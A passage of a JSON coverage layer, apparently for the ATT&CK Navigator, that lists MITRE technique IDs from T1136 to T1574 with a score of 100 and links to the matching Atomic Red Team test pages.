aster/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1496","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"},{"techniqueID":"T1543.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"},{"techniqueID":"T1546.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546.014","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"},{"techniqueID":"T1547.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.011/T1547.011.md"},{"techniqueID":"T1548.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"},{"techniqueID":"T1553.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"},{"techniqueID":"T1555","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"},{"techniqueID":"T1556.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1556","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"},{"techniqueID":"T1558.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"},{"techniqueID":"T1558.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1558","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"},{"techniqueID":"T1559.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1559","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"},{"techniqueID":"T1560.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"},{"techniqueID":"T1560.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"},{"techniqueID":"T1560","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"},{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"},{"techniqueID":"T1562.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"},{"techniqueID":"T1562.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"},{"techniqueID":"T1562.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"},{"techniqueID":"T1563.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1563","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"},{"techniqueID":"T1564.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"},{"techniqueID":"T1564.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"},{"techniqueID":"T1564.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"},{"techniqueID":"T1564.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"},{"techniqueID":"T1564","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"},{"techniqueID":"T1566.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1566","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"},{"techniqueID":"T1569.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"},{"techniqueID":"T1569.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1569","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"},{"techniqueID":"T1571","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"},{"techniqueID":"T1573","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"},{"techniqueID":"T1574.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"},{"techniqueID":"T1574.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"},{"techniqueID":"T1574.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"},{"techniqueID":"T1574.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"},{"techniqueID":"T1574.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"},{"techniqueID":"T1574.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"},{"techniqueID":"T1574","score":100,"enabled":true,"comment":"https://github.com/redcan